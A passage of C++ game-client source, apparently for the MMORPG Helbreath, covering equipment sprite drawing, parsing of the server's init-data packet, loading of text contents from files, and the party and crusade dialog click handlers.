			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{
				_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{
				if (bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iBootsColor] - m_wR[0], m_wG[iBootsColor] - m_wG[0], m_wB[iBootsColor] - m_wB[0], dwTime);
				}
			}

			if (iPantsIndex != -1)
			{
				if (bInv) m_pSprite[iPantsIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iPantsColor == 0)
						m_pSprite[iPantsIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iPantsColor] - m_wR[0], m_wG[iPantsColor] - m_wG[0], m_wB[iPantsColor] - m_wB[0], dwTime);
				}
			}

			if (iArmArmorIndex != -1)
			{
				if (bInv) m_pSprite[iArmArmorIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iArmColor == 0)
						m_pSprite[iArmArmorIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iArmColor] - m_wR[0], m_wG[iArmColor] - m_wG[0], m_wB[iArmColor] - m_wB[0], dwTime);
				}
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{
				if (bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iBootsColor] - m_wR[0], m_wG[iBootsColor] - m_wG[0], m_wB[iBootsColor] - m_wB[0], dwTime);
				}
			}

			if (iBodyArmorIndex != -1)
			{
				if (bInv) m_pSprite[iBodyArmorIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iArmorColor == 0)
						m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iArmorColor] - m_wR[0], m_wG[iArmorColor] - m_wG[0], m_wB[iArmorColor] - m_wB[0], dwTime);
				}
			}

			if (iHelmIndex != -1)
			{
				if (bInv) m_pSprite[iHelmIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iHelmColor == 0)
						m_pSprite[iHelmIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iHelmColor] - m_wR[0], m_wG[iHelmColor] - m_wG[0], m_wB[iHelmColor] - m_wB[0], dwTime);
				}
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrderOnRun[_tmp_cDir] == 2))
			{
				if (bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iMantleColor] - m_wR[0], m_wG[iMantleColor] - m_wG[0], m_wB[iMantleColor] - m_wB[0], dwTime);
				}
			}

			if (iShieldIndex != -1)
			{
				if (bInv) m_pSprite[iShieldIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iShieldColor == 0)
						m_pSprite[iShieldIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iShieldColor] - m_wR[0], m_wG[iShieldColor] - m_wG[0], m_wB[iShieldColor] - m_wB[0], dwTime);
				}
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX - 13 + dx, sY - 34 + dy, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrderOnRun[_tmp_cDir] == 1))
			{
				if (bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iMantleColor] - m_wR[0], m_wG[iMantleColor] - m_wG[0], m_wB[iMantleColor] - m_wB[0], dwTime);
				}
			}

			if (iWeaponIndex != -1)
			{
				if (bInv) m_pSprite[iWeaponIndex]->PutTransSprite25(sX + dx, sY + dy, _tmp_cFrame, dwTime);
				else
				{
					if (iWeaponColor == 0)
						m_pSprite[iWeaponIndex]->PutSpriteFast(sX + dx, sY + dy, _tmp_cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, m_wWR[iWeaponColor] - m_wR[0], m_wWG[iWeaponColor] - m_wG[0], m_wWB[iWeaponColor] - m_wB[0], dwTime);
				}
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
			}
		}

		if ((_tmp_iStatus & 0x20) != 0) 	// Berserk
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, 0, -5, -5, dwTime);
		DrawAngel(40 + (_tmp_cDir - 1), sX + dx + 20, sY + dy - 20, _tmp_cFrame % 4, dwTime);
		DrawWanted(sX + dx, sY + dy, dwTime);
		CheckActiveAura2(sX + dx, sY + dy, dwTime, _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX + dx, sY + dy, _tmp_cFrame, dwTime);

	}
	else if (strlen(_tmp_cName) > 0)
	{
		if ((_tmp_sOwnerType >= 1) && (_tmp_sOwnerType <= 6)) DrawObjectName(sX + dx, sY + dy, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX + dx, sY + dy, _tmp_sOwnerType, _tmp_iStatus);
			
		}
	}

	if (_tmp_iChatIndex != NULL)
	{
		if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{
			m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX + dx;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY + dy;
		}
		else
		{
			m_pMapData->ClearChatMsg(indexX, indexY);
		}
	}
	_tmp_dx = dx;
	_tmp_dy = dy;
	if ((m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top != -1)
		&& (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top < msY)
		&& (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom > msY)
		&& (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left < msX)
		&& (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right > msX)) return TRUE;
	return FALSE;
}

void CGame::InitDataResponseHandler(char * pData)
{
	int * ip, i;
	short * sp, sX, sY;
	char  * cp, cMapFileName[32], cTxt[120], cPreCurLocation[12];
	BOOL  bIsObserverMode;
	HANDLE hFile;
	DWORD  dwFileSize;

	ZeroMemory(cPreCurLocation, sizeof(cPreCurLocation));
	m_bParalyze = FALSE;
	m_pMapData->Init();

	m_sMonsterID = 0;
	m_dwMonsterEventTime = 0;

	m_dwReqUsersTime = m_dwCurTime + 30000;

	m_bHackMoveBlocked = FALSE;

	DisableDialogBox(7);
	DisableDialogBox(11);
	DisableDialogBox(13);
	DisableDialogBox(14);
	DisableDialogBox(16);
	DisableDialogBox(22);
	DisableDialogBox(20);
	DisableDialogBox(21);
	DisableDialogBox(23);
	DisableDialogBox(51); // Gail's diag
	DisableDialogBox(58); // Centuu : Guild Warehouse
	DisableDialogBox(43);
	DisableDialogBox(57); // MORLA 2.4 - shop 2

	m_cCommand = DEF_OBJECTSTOP;
	m_cCommandCount = 0;
	m_bIsGetPointingMode = FALSE;
	m_iPointCommandType = -1;
	m_iIlusionOwnerH = NULL;
	m_cIlusionOwnerType = NULL;
	m_bIsTeleportRequested = FALSE;
	m_bIsConfusion = FALSE;
	m_bSkillUsingStatus = FALSE;

	m_bItemUsingStatus = FALSE;

	m_cRestartCount = -1;
	m_dwRestartCountTime = NULL;

	for (i = 0; i < DEF_MAXEFFECTS; i++)
	{
		if (m_pEffectList[i] != NULL) delete m_pEffectList[i];
		m_pEffectList[i] = NULL;
	}

	for (i = 0; i < DEF_MAXWHETHEROBJECTS; i++)
	{
		m_stWhetherObject[i].sX = 0;
		m_stWhetherObject[i].sBX = 0;
		m_stWhetherObject[i].sY = 0;
		m_stWhetherObject[i].cStep = 0;
	}

	for (i = 0; i < DEF_MAXGUILDNAMES; i++)
	{
		m_stGuildName[i].dwRefTime = 0;
		m_stGuildName[i].iGuildRank = -1;
		ZeroMemory(m_stGuildName[i].cCharName, sizeof(m_stGuildName[i].cCharName));
		ZeroMemory(m_stGuildName[i].cGuildName, sizeof(m_stGuildName[i].cGuildName));
	}

	for (i = 0; i < DEF_MAXCHATMSGS; i++) {
		if (m_pChatMsgList[i] != NULL) delete m_pChatMsgList[i];
		m_pChatMsgList[i] = NULL;
	}

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

	// PlayerObjectID
	sp = (short *)cp;
	m_sPlayerObjectID = *sp;
	cp += 2;

	sp = (short *)cp;
	sX = *sp;
	cp += 2;

	sp = (short *)cp;
	sY = *sp;
	cp += 2;

	sp = (short *)cp;
	m_sPlayerType = *sp;
	cp += 2;

	sp = (short *)cp;
	m_sPlayerAppr1 = *sp;
	cp += 2;

	sp = (short *)cp;
	m_sPlayerAppr2 = *sp;
	cp += 2;

	sp = (short *)cp;
	m_sPlayerAppr3 = *sp;
	cp += 2;

	sp = (short *)cp;
	m_sPlayerAppr4 = *sp;
	cp += 2;

	ip = (int *)cp; // v1.4
	m_iPlayerApprColor = *ip;
	cp += 4;

	// CLEROTH - BLACK FIX
	ip = (int *)cp;
	m_iPlayerStatus = *ip;
	cp += 4;

	//Snoopy MIM fix
	if ((m_iPlayerStatus & 0x00200000) == 0x00200000)
	{
		m_bIllusionMVT = TRUE;
	}
	else
	{
		m_bIllusionMVT = FALSE;
	}

	ZeroMemory(m_cMapName, sizeof(m_cMapName));
	ZeroMemory(m_cMapMessage, sizeof(m_cMapMessage));
	memcpy(m_cMapName, cp, 10);
	m_cMapIndex = GetOfficialMapName(m_cMapName, m_cMapMessage);
	if (m_cMapIndex < 0)
	{
		m_stDialogBoxInfo[9].sSizeX = -1;
		m_stDialogBoxInfo[9].sSizeY = -1;
	}
	else
	{
		m_stDialogBoxInfo[9].sSizeX = 128;
		m_stDialogBoxInfo[9].sSizeY = 128;
	}
	cp += 10;

	strcpy(cPreCurLocation, m_cCurLocation);
	ZeroMemory(m_cCurLocation, sizeof(m_cCurLocation));
	memcpy(m_cCurLocation, cp, 10);
	cp += 10;

	G_cSpriteAlphaDegree = *cp;
	cp++;

	m_cWhetherStatus = *cp;
	cp++;
	switch (G_cSpriteAlphaDegree) { //Snoopy:  Xmas bulbs
		// Will be sent by server if DayTime is 3 (and a snowy weather)
	case 1:	m_bIsXmas = FALSE; break;
	case 2: m_bIsXmas = FALSE; break;
	case 3: // Snoopy Special night with chrismas bulbs
		if (m_cWhetherStatus >3) m_bIsXmas = TRUE;
		else m_bIsXmas = FALSE;
		G_cSpriteAlphaDegree = 2;
		break;
	}
	ip = (int *)cp;
	m_iContribution = *ip;
	cp += 4;
	bIsObserverMode = (BOOL)*cp;
	cp++;
	ip = (int *)cp;
	m_iRating = *ip;
	cp += 4;
	ip = (int *)cp;
	m_iHP = *ip;
	cp += 4;
	m_cDiscount = (char)*cp;
	cp++;

	if (m_cWhetherStatus != NULL)
		SetWhetherStatus(TRUE, m_cWhetherStatus);
	else SetWhetherStatus(FALSE, m_cWhetherStatus);

	ZeroMemory(cMapFileName, sizeof(cMapFileName));
	strcat(cMapFileName, "mapdata\\");
	// CLEROTH - MW MAPS
	if (memcmp(m_cMapName, "defaultmw", 9) == 0)
	{
		strcat(cMapFileName, "mw\\defaultmw");
}
	else
	{
		strcat(cMapFileName, m_cMapName);
	}

	strcat(cMapFileName, ".amd");
	m_pMapData->OpenMapDataFile(cMapFileName);

	m_pMapData->m_sPivotX = sX;
	m_pMapData->m_sPivotY = sY;

	m_sPlayerX = sX + 14 + 5;
	m_sPlayerY = sY + 12 + 5;

	m_cPlayerDir = 5;

	if (bIsObserverMode == FALSE)
	{
		m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir,
			m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor, // v1.4
			m_iPlayerStatus, m_cPlayerName,
			DEF_OBJECTSTOP, NULL, NULL, NULL);
	}
#ifdef RES_HIGH
	//m_sViewDstX = m_sViewPointX = (sX + 6) * 32;
	//m_sViewDstY = m_sViewPointY = (sY + 7) * 32;
	m_sViewDstX = m_sViewPointX = (sX + 7) * 32-16;
	m_sViewDstY = m_sViewPointY = (sY + 8) * 32-16;
	//_ReadMapData(sX + 6, sY + 7, cp);
	_ReadMapData(sX + 7, sY + 8, cp);
#else
	m_sViewDstX = m_sViewPointX = (sX + 4 + 5) * 32;
	m_sViewDstY = m_sViewPointY = (sY + 5 + 5) * 32;
	_ReadMapData(sX + 4 + 5, sY + 5 + 5, cp);
#endif
	m_bIsRedrawPDBGS = TRUE;
	// ------------------------------------------------------------------------+
	wsprintf(cTxt, INITDATA_RESPONSE_HANDLER1, m_cMapMessage);
	AddEventList(cTxt, 10);

	m_stDialogBoxInfo[6].sX = 150;
	m_stDialogBoxInfo[6].sY = 130;

	if ((memcmp(m_cCurLocation, "middleland", 10) == 0)
		|| (memcmp(m_cCurLocation, "dglv2", 5) == 0)
		|| (memcmp(m_cCurLocation, "middled1n", 9) == 0))
		EnableDialogBox(6, NULL, NULL, NULL);

	// Snoopy: removed for v351 compatibility. Maybe usefull later...


	// ------------------------------------------------------------------------+

	ChangeGameMode(DEF_GAMEMODE_ONMAINGAME);
	m_DDraw.ClearBackB4();

	//v1.41
	if ((m_sPlayerAppr2 & 0xF000) != 0)
		m_bIsCombatMode = TRUE;
	else m_bIsCombatMode = FALSE;

	//v1.42
	if (m_bIsFirstConn == TRUE)
	{
		m_bIsFirstConn = FALSE;
		hFile = CreateFile("contents\\contents1000.txt", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
		if (hFile == INVALID_HANDLE_VALUE)
			dwFileSize = 0;
		else
		{
			dwFileSize = GetFileSize(hFile, NULL);
			CloseHandle(hFile);
		}
		bSendCommand(MSGID_REQUEST_NOTICEMENT, NULL, NULL, (int)dwFileSize, NULL, NULL, NULL);
	}
}

void CGame::DrawChatMsgs(short sX, short sY, short dX, short dY)
{
 int i;

	for (i = 0; i < DEF_MAXCHATMSGS; i++)
	if (m_pChatMsgList[i] != NULL)
	if ( (m_pChatMsgList[i]->m_sX >= sX) && (m_pChatMsgList[i]->m_sX <= dX) &&
	     (m_pChatMsgList[i]->m_sY >= sY) && (m_pChatMsgList[i]->m_sY <= dY) ) {

		switch (m_pChatMsgList[i]->m_cType) {
		case 41:
		case 42:
		case 21:
		case 22:
		case 23:
			DrawChatMsgBox(m_pChatMsgList[i]->m_sX, m_pChatMsgList[i]->m_sY, i, FALSE);
			break;
		}
	}

	m_DDraw._GetBackBufferDC();
	for (i = 0; i < DEF_MAXCHATMSGS; i++)
	if (m_pChatMsgList[i] != NULL)
	if ( (m_pChatMsgList[i]->m_sX >= sX) && (m_pChatMsgList[i]->m_sX <= dX) &&
	     (m_pChatMsgList[i]->m_sY >= sY) && (m_pChatMsgList[i]->m_sY <= dY) ) {

		switch (m_pChatMsgList[i]->m_cType) {
		case 41:
		case 42:
		case 21:
		case 22:
		case 23:
			break;

		case 20:
		default:
			DrawChatMsgBox(m_pChatMsgList[i]->m_sX, m_pChatMsgList[i]->m_sY, i, TRUE);
			break;
		}
	}
	m_DDraw._ReleaseBackBufferDC();
}



void CGame::_LoadTextDlgContents(int cType)
{char * pContents, * token, cTemp[120], cFileName[120];
 char   seps[] = "\n";
 int    iIndex = 0, i;
 class  CStrTok * pStrTok;
 DWORD  dwFileSize;
 HANDLE hFile;
 FILE * pFile;
	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++)
	{	if (m_pMsgTextList[i] != NULL)
			delete m_pMsgTextList[i];
		m_pMsgTextList[i] = NULL;
	}
	// cType
	ZeroMemory(cTemp, sizeof(cTemp));
	ZeroMemory(cFileName, sizeof(cFileName));

	wsprintf(cTemp, "contents%d", cType);
	strcat(cFileName, "contents");
	strcat(cFileName, "\\");
	strcat(cFileName, "\\");
	strcat(cFileName, cTemp);
	strcat(cFileName, ".txt");

	hFile = CreateFile(cFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	dwFileSize = GetFileSize(hFile, NULL);
	if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
	pFile = fopen(cFileName, "rt");
	if (pFile == NULL) return;
	else
	{ 	pContents = new char[dwFileSize+1];
		ZeroMemory(pContents, dwFileSize+1);
		fread(pContents, dwFileSize, 1, pFile);
	}
	fclose(pFile);
	pStrTok = new class CStrTok(pContents, seps);
	token = pStrTok->pGet();
	while( token != NULL )
	{	m_pMsgTextList[iIndex] = new class CMsg(NULL, token, NULL);
		token = pStrTok->pGet();
		iIndex++;
	}
	delete pStrTok;
	delete[] pContents;
}



int CGame::_iLoadTextDlgContents2(int iType)
{char * pContents, * token, cTemp[120], cFileName[120];
 char   seps[] = "\n";
 int    iIndex = 0, i;
 class  CStrTok * pStrTok;
 DWORD  dwFileSize;
 HANDLE hFile;
 FILE * pFile;
	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++)
	{	if (m_pMsgTextList2[i] != NULL)
			delete m_pMsgTextList2[i];
		m_pMsgTextList2[i] = NULL;
	}
	// cType
	ZeroMemory(cTemp, sizeof(cTemp));
	ZeroMemory(cFileName, sizeof(cFileName));

	wsprintf(cTemp, "contents%d", iType);

	strcat(cFileName, "contents");
	strcat(cFileName, "\\");
	strcat(cFileName, "\\");
	strcat(cFileName, cTemp);
	strcat(cFileName, ".txt");
	hFile = CreateFile(cFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	dwFileSize = GetFileSize(hFile, NULL);
	if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
	pFile = fopen(cFileName, "rt");
	if (pFile == NULL) return -1;
	else
	{	pContents = new char[dwFileSize+1];
		if (pContents == NULL) return -1;
		ZeroMemory(pContents, dwFileSize+1);
		fread(pContents, dwFileSize, 1, pFile);
	}
	fclose(pFile);
	pStrTok = new class CStrTok(pContents, seps);
	token = pStrTok->pGet();
	while( token != NULL )
	{	m_pMsgTextList2[iIndex] = new class CMsg(NULL, token, NULL);
		token = pStrTok->pGet();
		iIndex++;
	}
	delete pStrTok;
	delete[] pContents;
	return iIndex;
}




void CGame::_LoadGameMsgTextContents()
{
 char * pContents, * token, cTemp[120], cFileName[120];
 char   seps[] = ";\n";
 int    iIndex = 0, i;
 class  CStrTok * pStrTok;
 DWORD  dwFileSize;
 HANDLE hFile;
 FILE * pFile;

	for (i = 0; i < DEF_MAXGAMEMSGS; i++) {
		if (m_pGameMsgList[i] != NULL)
			delete m_pGameMsgList[i];
		m_pGameMsgList[i] = NULL;
	}

	ZeroMemory(cTemp, sizeof(cTemp));
	ZeroMemory(cFileName, sizeof(cFileName));

	strcpy(cTemp, "GameMsgList");

	strcat(cFileName, "contents");
	strcat(cFileName, "\\");
	strcat(cFileName, "\\");
	strcat(cFileName, cTemp);
	strcat(cFileName, ".txt");

	hFile = CreateFile(cFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	dwFileSize = GetFileSize(hFile, NULL);
	if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);

	pFile = fopen(cFileName, "rt");
	if (pFile == NULL) return;
	else {
		pContents = new char[dwFileSize+1];
		ZeroMemory(pContents, dwFileSize+1);
		fread(pContents, dwFileSize, 1, pFile);
		fclose(pFile);
	}

	pStrTok = new class CStrTok(pContents, seps);
	token = pStrTok->pGet();
	while( token != NULL ) {
		m_pGameMsgList[iIndex] = new class CMsg(NULL, token, NULL);
		token = pStrTok->pGet();
		iIndex++;
	}

	delete pStrTok;
	delete[] pContents;
}

void CGame::DlgBoxClick_Party(short msX, short msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[32].sX;
	sY = m_stDialogBoxInfo[32].sY;

	switch (m_stDialogBoxInfo[32].cMode) {
	case 0:
		if (m_iPartyStatus == 0)
		{	if ((msX > sX + 80) && (msX < sX + 195) && (msY > sY + 80) && (msY < sY + 100))
			{	m_stDialogBoxInfo[32].cMode = 2;
				m_bIsGetPointingMode = TRUE;
				m_iPointCommandType  = 200;
				PlaySound('E', 14, 5);
		}	}

		if (m_iPartyStatus != 0)
		{	if ((msX > sX + 80) && (msX < sX + 195) && (msY > sY + 100) && (msY < sY + 120))
			{	m_stDialogBoxInfo[32].cMode = 11;
				PlaySound('E', 14, 5);
		}	}

		if (m_iPartyStatus != 0)
		{	if ((msX > sX + 80) && (msX < sX + 195) && (msY > sY + 120) && (msY < sY + 140))
			{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_JOINPARTY, NULL, 2, NULL, NULL, m_cMCName);
				m_stDialogBoxInfo[32].cMode = 4;
				PlaySound('E', 14, 5);
		}	}

		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) DisableDialogBox(32);
		break;

	case 1:
		if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_ACCEPTJOINPARTY, NULL, 1, NULL, NULL, m_stDialogBoxInfo[32].cStr);
			DisableDialogBox(32);
			PlaySound('E', 14, 5);
		}

		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_ACCEPTJOINPARTY, NULL, 0, NULL, NULL, m_stDialogBoxInfo[32].cStr);
			DisableDialogBox(32);
			PlaySound('E', 14, 5);
		}
		break;

	case 2:
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			m_stDialogBoxInfo[32].cMode = 0;
			PlaySound('E', 14, 5);
		}
		break;

	case 3:
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			m_stDialogBoxInfo[32].cMode = 0;
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_ACCEPTJOINPARTY, NULL, 2, NULL, NULL, m_stDialogBoxInfo[32].cStr);
			DisableDialogBox(32);
			PlaySound('E', 14, 5);
		}
		break;

	case 4:
	case 6:
	case 7:
	case 8:
	case 9:
	case 10:
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			m_stDialogBoxInfo[32].cMode = 0;
			PlaySound('E', 14, 5);
		}
		break;

	case 11:
		if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_JOINPARTY, NULL, NULL, NULL, NULL, m_cMCName);
			m_stDialogBoxInfo[32].cMode = 5;
			PlaySound('E', 14, 5);
		}

		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			m_stDialogBoxInfo[32].cMode = 0;
			PlaySound('E', 14, 5);
		}
		break;
	}
}


void CGame::DlgBoxClick_CrusadeJob(short msX, short msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[33].sX;
	sY = m_stDialogBoxInfo[33].sY;

	switch (m_stDialogBoxInfo[33].cMode) {
	case 1:
		if( m_bCitizen == FALSE )
		{	DisableDialogBox(33);
			PlaySound('E', 14, 5);
		}else if (m_bAresden == TRUE)
		{	if (m_iGuildRank == 0)
			{	if ((msX > sX + 24) && (msX < sX + 246) && (msY > sY + 150) && (msY < sY + 165))
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_SELECTCRUSADEDUTY, NULL, 3, NULL, NULL, NULL);
					DisableDialogBox(33);
					PlaySound('E', 14, 5);
				}
 			}else
			{	if ((msX > sX + 24) && (msX < sX + 246) && (msY > sY + 150) && (msY < sY + 165))
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_SELECTCRUSADEDUTY, NULL, 1, NULL, NULL, NULL);
					DisableDialogBox(33);
				}
				if (m_iGuildRank != -1)
				{	if ((msX > sX + 24) && (msX < sX + 246) && (msY > sY + 175) && (msY < sY + 190))
					{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_SELECTCRUSADEDUTY, NULL, 2, NULL, NULL, NULL);
						DisableDialogBox(33);
						PlaySound('E', 14, 5);
			}	}	}
		}else if (m_bAresden == FALSE)
		{	if (m_iGuildRank == 0)
			{	if ((msX > sX + 24) && (msX < sX + 246) && (msY > sY + 150) && (msY < sY + 165))
